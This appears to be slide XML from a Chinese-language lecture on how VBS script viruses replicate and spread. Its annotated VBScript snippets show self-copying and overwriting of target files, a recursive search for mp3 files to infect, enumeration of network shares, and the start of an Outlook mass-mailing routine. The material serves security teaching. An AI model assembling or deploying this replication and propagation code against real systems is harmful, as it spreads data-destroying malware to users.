                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>欺骗性强</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>使得病毒生产机实现起来非常容易</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本病毒如何感染复制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1353820"/>
            <a:ext cx="10908030" cy="5188585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>set fso=createobject("scripting.filesystemobject")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创建一个文件系统对象</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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set self=fso.opentextfile(wscript.scriptfullname,1)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读打开当前文件</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即病毒本身</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</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vbscopy=self.readall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读取病毒全部代码到字符串变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>vbscopy……</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set ap=fso.opentextfile(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目标文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>.path,2,true)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打开目标文件，准备写入病毒代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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ap.write vbscopy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将病毒代码覆盖目标文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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ap.close</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set cop=fso.getfile(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目标文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>.path)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得到目标文件路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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cop.copy(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目标文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>.path &amp; ".vbs")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创建另外一个病毒文件</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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>.vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为后缀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</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目标文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>.delete(true)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删除目标文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通过感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>htm</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asp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jsp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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等网页文件传播</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cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>在注册表</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT\CLSID\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>下我们可以找到这么一个主键</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>，注册表中对它他的说明是“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Windows Script Host Shell Object”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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同样，我们也可以找到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>{0D43FE01-F093-11CF-8940-00A0C9054228}</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>，注册表对它的说明是“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>FileSystem Object”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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过局域网共享传播</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23557" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459105" y="1306830"/>
            <a:ext cx="11261725" cy="4902835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"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welcome_msg = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络连接搜索测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>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Set WSHNetwork = WScript.CreateObject("WScript.Network")</a:t>
            </a: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’创建一个网络对象</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"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Set oPrinters = WshNetwork.EnumPrinterConnections</a:t>
            </a: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’创建一个网络打印机连接列表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"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WScript.Echo "Network printer mappings: "</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For i = 0 to oPrinters.Count – 1  Step 2     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>’显示网络打印机连接情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"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WScript.Echo "Port "&amp;oPrinters.Item(i) &amp; " = " &amp; oPrinters.Item(i+1)</a:t>
            </a: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Next</a:t>
            </a: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Set colDrives = WSHNetwork.EnumNetworkDrives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创建一个网络共享连接列表</a:t>
            </a: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603885" y="-60960"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件搜索代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586740" y="947420"/>
            <a:ext cx="11019155" cy="5832475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sub scan(folder_)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>             'scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>函数定义，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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on error resume next      </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如果出现错误，直接跳过，防止弹出错误窗口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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set folder_=fso.getfolder(folder_)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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set files=folder_.files      </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当前目录的所有文件集合</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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for each file in filesext=fso.GetExtensionName(file) </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获取文件后缀</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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ext=lcase(ext)</a:t>
            </a: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后缀名转换成小写字母</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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if ext="mp3" then </a:t>
            </a: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如果后缀名是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>mp3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，则进行感染。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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Wscript.echo (file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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end if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>   set subfolders=folder_.subfolders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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for each subfolder in subfolders '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>搜索其他目录；递归调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>scan()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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scan(subfolder)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>end sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="240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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本病毒通过网络传播的几种方式及代码分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20482" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842645" y="1791970"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>附件传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918845" y="2301240"/>
            <a:ext cx="9238615" cy="3211195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Function mailBroadcast()</a:t>
            </a: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on error resume next</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wscript.echo</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Set outlookApp = CreateObject("Outlook.Application")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
